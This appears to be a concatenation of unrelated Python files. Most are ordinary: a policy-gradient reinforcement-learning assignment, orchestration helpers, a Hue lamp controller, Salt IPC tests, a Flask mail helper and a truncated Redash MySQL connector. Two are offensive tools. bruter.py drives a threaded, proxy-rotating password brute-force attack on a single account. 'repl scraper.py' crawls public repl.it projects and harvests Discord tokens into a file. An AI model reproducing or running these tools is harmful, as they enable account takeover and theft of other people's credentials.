#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
sy_logits_na = policy_parameters
# YOUR_CODE_HERE
sy_logprob_n = -tf.nn.sparse_softmax_cross_entropy_with_logits(labels=sy_ac_na, logits=sy_logits_na)
else:
sy_mean, sy_logstd = policy_parameters
# YOUR_CODE_HERE
# sy_logprob_n = -tf.contrib.distributions.MultivariateNormalDiag(loc=sy_mean, scale_diag=tf.exp(sy_logstd)).log_prob(sy_ac_na)
sy_logprob_n = -tf.reduce_sum(tf.square((sy_ac_na - sy_mean) / tf.exp(sy_logstd)), axis=1) / 2
return sy_logprob_n
def build_computation_graph(self):
"""
Notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch self.size /n/, observation dim)
_na - this tensor should have shape (batch self.size /n/, action dim)
_n - this tensor should have shape (batch self.size /n/)
Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
#========================================================================================#
# ----------PROBLEM 2----------
# Loss Function and Training Operation
#========================================================================================#
loss = -tf.reduce_mean(self.sy_logprob_n * self.sy_adv_n) # YOUR CODE HERE
self.update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(loss)
#========================================================================================#
# ----------PROBLEM 6----------
# Optional Baseline
#
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
#========================================================================================#
if self.nn_baseline:
self.baseline_prediction = tf.squeeze(build_mlp(
self.sy_ob_no,
1,
"nn_baseline",
n_layers=self.n_layers,
size=self.size))
# YOUR_CODE_HERE
self.sy_target_n = tf.placeholder(shape=[None], name="baseline", dtype=tf.float32)
baseline_loss = tf.nn.l2_loss(self.baseline_prediction - self.sy_target_n)
self.baseline_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(baseline_loss)
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards = [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no: ob[None]}) # YOUR CODE HERE
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > self.max_path_length:
break
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32)}
return path
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
def sum_of_rewards(self, re_n):
"""
Monte Carlo estimation of the Q function.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
----------------------------------------------------------------------------------
Your code should construct numpy arrays for Q-values which will be used to compute
advantages (which will in turn be fed to the placeholder you defined in
Agent.define_placeholders).
Recall that the expression for the policy gradient PG is
PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
where
tau=(s_0, a_0, ...) is a trajectory,
Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
and b_t is a baseline which may depend on s_t.
You will write code for two cases, controlled by the flag 'reward_to_go':
Case 1: trajectory-based PG
(reward_to_go = False)
Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
entire trajectory (regardless of which time step the Q-value should be for).
For this case, the policy gradient estimator is
E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
where
Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
Thus, you should compute
Q_t = Ret(tau)
Case 2: reward-to-go PG
(reward_to_go = True)
Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
from time step t. Thus, you should compute
Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
like the 'ob_no' and 'ac_na' above.
"""
# YOUR_CODE_HERE
q_n = []
for r in re_n:
T = len(r)
if self.reward_to_go:
q_n += [(np.power(self.gamma, np.arange(T - t)) * r[t:]).sum() for t in range(T)]
else:
q_n += [(np.power(self.gamma, np.arange(T)) * r).sum() for t in range(T)]
return np.array(q_n)
def compute_advantage(self, ob_no, q_n):
"""
Computes advantages by (possibly) subtracting a baseline from the estimated Q values
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Computing Baselines
#====================================================================================#
if self.nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current batch of Q-values. (Goes with Hint
# #bl2 in Agent.update_parameters.
b_n = self.sess.run(self.baseline_prediction, feed_dict={self.sy_ob_no: ob_no}) # YOUR CODE HERE
adv_n = q_n - (b_n * q_n.std(axis=0) + q_n.mean(axis=0))
else:
adv_n = q_n.copy()
return adv_n
def estimate_return(self, ob_no, re_n):
"""
Estimates the returns over a set of trajectories.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
q_n = self.sum_of_rewards(re_n)
adv_n = self.compute_advantage(ob_no, q_n)
#====================================================================================#
# ----------PROBLEM 3----------
# Advantage Normalization
#====================================================================================#
if self.normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
adv_n = (adv_n - adv_n.mean(axis=0)) / (adv_n.std(axis=0) + 1e-7) # YOUR_CODE_HERE
return q_n, adv_n
def update_parameters(self, ob_no, ac_na, q_n, adv_n):
"""
Update the parameters of the policy and (possibly) the neural network baseline,
which is trained to approximate the value function.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Optimizing Neural Network Baseline
#====================================================================================#
if self.nn_baseline:
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 in
# Agent.compute_advantage.)
# YOUR_CODE_HERE
self.sess.run(self.baseline_update_op, feed_dict={
self.sy_ob_no: ob_no,
self.sy_target_n: (q_n - q_n.mean(axis=0)) / (q_n.std(axis=0) + 1e-7)
})
#====================================================================================#
# ----------PROBLEM 3----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
# YOUR_CODE_HERE
self.sess.run(self.update_op, feed_dict={self.sy_ob_no: ob_no, self.sy_ac_na: ac_na, self.sy_adv_n: adv_n})
def train_PG(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
reward_to_go,
animate,
logdir,
normalize_advantages,
nn_baseline,
seed,
n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous, or self.discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_return_args = {
'gamma': gamma,
'reward_to_go': reward_to_go,
'nn_baseline': nn_baseline,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_return_args)
# build computation graph
agent.build_computation_graph()
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = [path["reward"] for path in paths]
q_n, adv_n = agent.estimate_return(ob_no, re_n)
agent.update_parameters(ob_no, ac_na, q_n, adv_n)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=64)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
utils.py
|
import registry
import threading
import time
import requests
from . import app
ORCHESTRATOR_ENDPOINT = app.config.get('ORCHESTRATOR_ENDPOINT')
def validate(data, required_fields):
"""Validate if all required_fields are in the given data dictionary"""
if all(field in data for field in required_fields):
return True
return False
def trim_dn(username, version, framework, dn):
dn = dn.replace("instances", "")
if username is not None:
dn = dn.replace("/{}".format(username), "")
if version is not None:
dn = dn.replace("/{}".format(version), "")
if framework is not None:
dn = dn.replace("/{}".format(framework), "")
return dn
def print_full_instance(instance):
""" Try to get all the info from an instance or if error, return the dn"""
try:
return {
"result": "success",
"uri": str(instance.dn).replace("instances", "clusters"),
"data": {
"name": instance.dnsname,
"dn": instance.dn,
"status": instance.status
}
}
except registry.KeyDoesNotExist as e:
return {
"result": "failure",
"uri": str(instance.dn),
"message": e.message
}
def print_instance(instance, filters):
""" Try to get the basic info from the instance or if error, return the dn"""
(username, service, version) = filters
try:
return {
"result": "success",
# FIXME we have to return the full uri so that the interface
# works, plus the "instances" part of the uri has to be
# replaced by "clusters" so that it matches the endpoint
"uri": str(instance.dn).replace("instances", "clusters"),
"data": {
"name" : instance.dnsname,
"dn" : instance.dn,
"status" : instance.status
}
}
except registry.KeyDoesNotExist as e:
return {
"result": "failure",
"uri": str(instance.dn),
"message": e.message
}
def launch_orchestrator_when_ready(clusterdn):
"""Launch the orchestrator process"""
cluster = registry.get_cluster(dn=clusterdn)
clusterid = registry.id_from(clusterdn)
def orchestrate_when_cluster_is_ready():
# TODO Use a blocking kv query to have inmediate notification
app.logger.info('Waiting for cluster nodes to be scheduled')
while cluster.status != 'scheduled':
time.sleep(5)
app.logger.info('All cluster nodes has been scheduled')
# Wait so containers can boot
#app.logger.info('Waiting 20s for containers to boot')
#time.sleep(20)
app.logger.info('Launching orchestrator')
requests.post('{}/{}'.format(ORCHESTRATOR_ENDPOINT, clusterid))
t = threading.Thread(target=orchestrate_when_cluster_is_ready)
t.daemon = True
t.start()
|
bruter.py
|
# Date: 12/28/2018
# Author: Mohamed
# Description: Bruter
from time import time, sleep
from .browser import Browser
from .session import Session
from .display import Display
from threading import Thread, RLock
from .proxy_manager import ProxyManager
from .password_manager import PasswordManager
from .const import max_time_to_wait, max_bots_per_proxy
class Bruter(object):
def __init__(self, username, threads, passlist_path, resume):
self.browsers = []
self.lock = RLock()
self.password = None
self.is_alive = True
self.is_found = False
self.bots_per_proxy = 0
self.username = username
self.last_password = None
self.active_passwords = []
self.proxy_manager = ProxyManager()
self.display = Display(username, passlist_path)
self.session = Session(username, passlist_path)
self.password_manager = PasswordManager(
passlist_path, threads, self.session, resume)
if resume:
data = self.session.read()
if data:
self.password_manager.passlist = eval(data['list'])
self.password_manager.attempts = int(data['attempts'])
def manage_session(self):
if self.password_manager.is_read:
if not self.password_manager.list_size or self.is_found:
self.session.delete()
else:
if self.is_found:
self.session.delete()
else:
self.session.write(self.password_manager.attempts,
self.password_manager.passlist)
def browser_manager(self):
while self.is_alive:
for browser in self.browsers:
if not self.is_alive:
break
if Display.account_exists == None and Browser.account_exists != None:
Display.account_exists = Browser.account_exists
if not browser.is_active:
password = browser.password
if browser.is_attempted and not browser.is_locked:
if browser.is_found and not self.is_found:
self.password = password
self.is_found = True
with self.lock:
self.password_manager.list_remove(password)
else:
with self.lock:
self.proxy_manager.bad_proxy(browser.proxy)
self.remove_browser(browser)
else:
if browser.start_time:
if time() - browser.start_time >= max_time_to_wait:
browser.close()
def remove_browser(self, browser):
if browser in self.browsers:
with self.lock:
self.browsers.pop(self.browsers.index(browser))
self.active_passwords.pop(
self.active_passwords.index(browser.password))
def attack(self):
proxy = None
is_attack_started = False
while self.is_alive:
browsers = []
for password in self.password_manager.passlist:
if not self.is_alive:
break
if not proxy:
proxy = self.proxy_manager.get_proxy()
self.bots_per_proxy = 0
if self.bots_per_proxy >= max_bots_per_proxy:
proxy = None
if not proxy:
continue
if not password in self.active_passwords and password in self.password_manager.passlist:
browser = Browser(self.username, password, proxy)
browsers.append(browser)
self.bots_per_proxy += 1
if not is_attack_started:
self.display.info('Starting attack ...')
is_attack_started = True
with self.lock:
self.browsers.append(browser)
self.active_passwords.append(password)
for browser in browsers:
thread = Thread(target=browser.attempt)
thread.daemon = True
try:
thread.start()
except RuntimeError:
self.remove_browser(browser)
def start_daemon_threads(self):
attack = Thread(target=self.attack)
browser_manager = Thread(target=self.browser_manager)
proxy_manager = Thread(target=self.proxy_manager.start)
password_manager = Thread(target=self.password_manager.start)
attack.daemon = True
proxy_manager.daemon = True
browser_manager.daemon = True
password_manager.daemon = True
attack.start()
proxy_manager.start()
browser_manager.start()
password_manager.start()
self.display.info('Searching for proxies ...')
def stop_daemon_threads(self):
self.proxy_manager.stop()
self.password_manager.stop()
def start(self):
self.display.info('Initiating daemon threads ...')
self.start_daemon_threads()
last_attempt = 0
while self.is_alive and not self.is_found:
if last_attempt == self.password_manager.attempts and self.password_manager.attempts:
sleep(0.1)
continue
for browser in self.browsers:
self.display.stats(
browser.password, self.password_manager.attempts, len(self.browsers))
last_attempt = self.password_manager.attempts
self.last_password = browser.password
if not self.is_alive or self.is_found:
break
if self.password_manager.is_read and not self.password_manager.list_size and not len(self.browsers):
self.is_alive = False
def stop(self):
self.is_alive = False
self.manage_session()
self.stop_daemon_threads()
self.session.is_busy = False
|
repl scraper.py
|
import requests, json, base64, re, random, time, uuid
from bs4 import BeautifulSoup
from threading import Thread
class queue:
queue=['https://repl.it/site/repls']
checked=[]
def scrapepos(indexpos):
currenturl=queue.queue[indexpos]
del queue.queue[indexpos]
print(f'Scraping: [ {currenturl} ]')
soup=BeautifulSoup(requests.get(currenturl).text,'html.parser')
if re.match('https?:\/\/repl.it\/@(([^/]+){3,15})\/(.{1,60})',currenturl)!=None:
try:
json1=soup.findAll('script',text=True)[-1].text.strip()
json1=json.loads(json1[json1.find('{'):].splitlines()[0])
files=json1['props']['initialState']['files']
for i in files.values():
code=base64.b64decode(i['content']['asEncoding']['base64']).decode('utf8')
code=''.join(code.split())
regex='([A-z0-9]{24})\.([A-z0-9-]{6})\.([A-z0-9-]{27})'
r=re.search(regex,code)
if r!=None:
open('tokens.txt','a').write(f'\nFound token in {currenturl}: '+r.group())
print(f'Found token in {currenturl}: {g}{r.group()}{r}')
except:
return
else:
for link in soup.findAll('a'):
currenturl=link.get('href')
if currenturl==None:continue
try:
if currenturl[0]=='.':continue
if currenturl[0]=='/':currenturl='https://repl.it'+currenturl
if not currenturl.startswith('http'):currenturl='https://repl.it/'+currenturl
if currenturl not in queue.queue and uuid.uuid3(uuid.NAMESPACE_URL,currenturl) not in queue.checked:
if currenturl.startswith('https://repl.it'):
if 'bot' in currenturl.lower() or 'discord' in currenturl.lower() or 'selfbot' or 'replbot' in currenturl.lower() or 'antinuke' in currenturl.lower() or 'exeter' in currenturl.lower() in currenturl.lower() or currenturl.startswith('https://repl.it/site/repls') or re.match('(https:\/\/repl.itDELETETHIS\/@)[A-z0-9]{3,15}$',currenturl)!=None:
queue.queue.append(currenturl)
queue.checked.append(uuid.uuid3(uuid.NAMESPACE_URL,currenturl))
except:
continue
print('...')
open('tokens.txt','w').write('\n...\n')
def scrape(threadid):
while True:
try:
queue.queue=queue.queue[:10000]
indexpos=random.randint(0,len(queue.queue)-1)
scrapepos(indexpos)
except:
pass
for i in range(500):
try:
Thread(target=scrape,args=(i,)).start()
except:
pass
while True:
time.sleep(1)
|
huecontroller.py
|
from phue import Bridge
from threading import Thread
import time
from rgb_cie import ColorHelper
import numpy as np
class HueController:
LEFT_LAMP_NBR = 1
RIGHT_LAMP_NBR = 3
BRIDGE_IP = '192.168.0.243'
def __init__(self, frame_listener):
def lamp_controller():
while True:
time.sleep(0.1)
if self.frame_listener.get_confidence() > 0.1:
hand_angle = self.frame_listener.get_hand_angle()
prev_lamp = self.current_lamp
if self.current_lamp == self.LEFT_LAMP_NBR and hand_angle > np.pi/2.0 + np.pi/8.0:
self.current_lamp = self.RIGHT_LAMP_NBR
elif self.current_lamp == self.RIGHT_LAMP_NBR and hand_angle < np.pi/2.0 - np.pi/8.0:
self.current_lamp = self.LEFT_LAMP_NBR
if prev_lamp != self.current_lamp:
xy = b.get_light(prev_lamp, 'xy')
b.set_light(prev_lamp, 'on', False)
b.set_light(self.current_lamp, 'on', True)
b.set_light(self.current_lamp, 'xy', xy)
bri = self.get_current_brightness()
lamp_on = b.get_light(self.current_lamp, 'on')
if bri == 0:
if lamp_on:
b.set_light(self.current_lamp, 'on', False)
else:
if not lamp_on:
b.set_light(self.current_lamp, 'on', True)
b.set_light(self.current_lamp, 'bri', bri)
new_finger_down = self.frame_listener.pop_new_finger_down_if_any()
if not new_finger_down is None:
b.lights[self.current_lamp - 1].xy = ColorHelper().getXYPointFromRGB(*self.colors[new_finger_down])
self.current_lamp = self.RIGHT_LAMP_NBR
self.frame_listener = frame_listener
b = Bridge(self.BRIDGE_IP)
b.connect()
b.set_light(self.LEFT_LAMP_NBR, 'on', False)
b.set_light(self.RIGHT_LAMP_NBR, 'on', False)
self.colors = [(255, 0, 0), (0, 255, 0), (0, 0, 255), (255, 255, 255)]
Thread(target=lamp_controller).start()
def get_current_brightness(self):
# roughly go between ranges [1, 0] to [0, 255]
angle = self.frame_listener.get_average_angle()
if self.frame_listener.get_confidence() == 0 or angle is None:
return 0
return int(min(255, 255.0*min(1.0, max(0.0, -angle + 0.5))))
|
test_ipc.py
|
"""
:codeauthor: Mike Place <mp@saltstack.com>
"""
import errno
import logging
import os
import threading
import pytest
import salt.config
import salt.exceptions
import salt.ext.tornado.gen
import salt.ext.tornado.ioloop
import salt.ext.tornado.testing
import salt.transport.client
import salt.transport.ipc
import salt.transport.server
import salt.utils.platform
from salt.ext.tornado.iostream import StreamClosedError
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import skipIf
pytestmark = [
pytest.mark.skip_on_darwin,
pytest.mark.skip_on_freebsd,
pytest.mark.skip_on_windows,
]
log = logging.getLogger(__name__)
@skipIf(salt.utils.platform.is_windows(), "Windows does not support Posix IPC")
class IPCMessagePubSubCase(salt.ext.tornado.testing.AsyncTestCase):
"""
Test all of the clear msg stuff
"""
def setUp(self):
super().setUp()
self.opts = {"ipc_write_buffer": 0}
self.socket_path = os.path.join(RUNTIME_VARS.TMP, "ipc_test.ipc")
self.pub_channel = self._get_pub_channel()
self.sub_channel = self._get_sub_channel()
def _get_pub_channel(self):
pub_channel = salt.transport.ipc.IPCMessagePublisher(
self.opts,
self.socket_path,
)
pub_channel.start()
return pub_channel
def _get_sub_channel(self):
sub_channel = salt.transport.ipc.IPCMessageSubscriber(
socket_path=self.socket_path,
io_loop=self.io_loop,
)
sub_channel.connect(callback=self.stop)
self.wait()
return sub_channel
def tearDown(self):
super().tearDown()
try:
self.pub_channel.close()
except OSError as exc:
if exc.errno != errno.EBADF:
# If its not a bad file descriptor error, raise
raise
try:
self.sub_channel.close()
except OSError as exc:
if exc.errno != errno.EBADF:
# If its not a bad file descriptor error, raise
raise
os.unlink(self.socket_path)
del self.pub_channel
del self.sub_channel
def test_multi_client_reading(self):
# To be completely fair let's create 2 clients.
client1 = self.sub_channel
client2 = self._get_sub_channel()
call_cnt = []
# Create a watchdog to be safe from hanging in sync loops (what old code did)
evt = threading.Event()
def close_server():
if evt.wait(1):
return
client2.close()
self.stop()
watchdog = threading.Thread(target=close_server)
watchdog.start()
# Runs in ioloop thread so we're safe from race conditions here
def handler(raw):
call_cnt.append(raw)
if len(call_cnt) >= 2:
evt.set()
self.stop()
# Now let both waiting data at once
client1.read_async(handler)
client2.read_async(handler)
self.pub_channel.publish("TEST")
self.wait()
self.assertEqual(len(call_cnt), 2)
self.assertEqual(call_cnt[0], "TEST")
self.assertEqual(call_cnt[1], "TEST")
def test_sync_reading(self):
# To be completely fair let's create 2 clients.
client1 = self.sub_channel
client2 = self._get_sub_channel()
call_cnt = []
# Now let both waiting data at once
self.pub_channel.publish("TEST")
ret1 = client1.read_sync()
ret2 = client2.read_sync()
self.assertEqual(ret1, "TEST")
self.assertEqual(ret2, "TEST")
@salt.ext.tornado.testing.gen_test
def test_async_reading_streamclosederror(self):
client1 = self.sub_channel
call_cnt = []
# Create a watchdog to be safe from hanging in sync loops (what old code did)
evt = threading.Event()
def close_server():
if evt.wait(0.001):
return
client1.close()
self.stop()
watchdog = threading.Thread(target=close_server)
watchdog.start()
# Runs in ioloop thread so we're safe from race conditions here
def handler(raw):
pass
try:
ret1 = yield client1.read_async(handler)
self.wait()
except StreamClosedError as ex:
assert False, "StreamClosedError was raised inside the Future"
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from todoism.extensions import mail
def _send_mail_async(app, message):
with app.app_context():
mail.send(message)
def send_mail(to, subject, template, **kwargs):
message = Message(current_app.config['TODOISM_MAIL_SUBJECT_PREFIX'] + subject, recipients=[to])
message.body = render_template(template + '.txt', **kwargs)
message.html = render_template(template + '.html', **kwargs)
app = current_app._get_current_object()
thr = Thread(target=_send_mail_async, args=[app, message])
thr.start()
return thr
def send_confirm_mail(user, token, to=None):
send_mail(subject='Email Confirm', to=to or user.email, template='emails/confirm', user=user, token=token)
|
mysql.py
|
import logging
import os
import threading
from redash.query_runner import (
TYPE_FLOAT,
TYPE_INTEGER,
TYPE_DATETIME,
TYPE_STRING,
TYPE_DATE,
BaseSQLQueryRunner,
InterruptException,
JobTimeoutException,
register,
)
from redash.settings import parse_boolean
from redash.utils import json_dumps, json_loads
from redash.tasks.worker import JobTimeoutException
try:
import MySQLdb
enabled = True
except ImportError:
enabled = False
logger = logging.getLogger(__name__)
types_map = {
0: TYPE_FLOAT,
1: TYPE_INTEGER,
2: TYPE_INTEGER,
3: TYPE_INTEGER,
4: TYPE_FLOAT,
5: TYPE_FLOAT,
7: TYPE_DATETIME,
8: TYPE_INTEGER,
9: TYPE_INTEGER,
10: TYPE_DATE,
12: TYPE_DATETIME,
15: TYPE_STRING,
16: TYPE_INTEGER,
246: TYPE_FLOAT,
253: TYPE_STRING,
254: TYPE_STRING,
}
class Result(object):
def __init__(self):
pass
class Mysql(BaseSQLQueryRunner):
noop_query = "SELECT 1"
@classmethod
def configuration_schema(cls):
show_ssl_settings = parse_boolean(
os.environ.get("MYSQL_SHOW_SSL_SETTINGS", "true")
)
schema = {
"type": "object",
"properties": {
"host": {"type": "string", "default": "127.0.0.1"},
"user": {"type": "string"},
"passwd": {"type": "string", "title": "Password"},
"db": {"type": "string", "title": "Database name"},
"port": {"type": "number", "default": 3306},
},
"order": ["host", "port", "user", "passwd", "db"],
"required": ["db"],
"secret": ["passwd"],
}
if show_ssl_settings:
schema["properties"].update(
{
"use_ssl": {"type": "boolean", "title": "Use SSL"},
"ssl_cacert": {
"type": "string",
"title": "Path to CA certificate file to verify peer against (SSL)",
},
"ssl_cert": {
"type": "string",
"title": "Path to client certificate file (SSL)",
},
"ssl_key": {
"type": "string",
"title": "Path to private key file (SSL)",
},
}
)
return schema
@classmethod
def name(cls):
return "MySQL"
@classmethod
def enabled(cls):
return enabled
def _connection(self):
params = dict(
host=self.configuration.get("host", ""),
user=self.configuration.get("user", ""),
passwd=self.configuration.get("passwd", ""),
db=self.configuration["db"],
port=self.configuration.get("port", 3306),
charset="utf8",
use_unicode=True,
connect_timeout=60,
)
ssl_options = self._get_ssl_parameters()
if ssl_options:
params["ssl"] = ssl_options
connection = MySQLdb.connect(**params)
return connection
def _get_tables(self, schema):
query = """
SELECT col.table_schema as table_schema,
col.table_name as table_name,
col.column_name as column_name
FROM `information_schema`.`columns` col
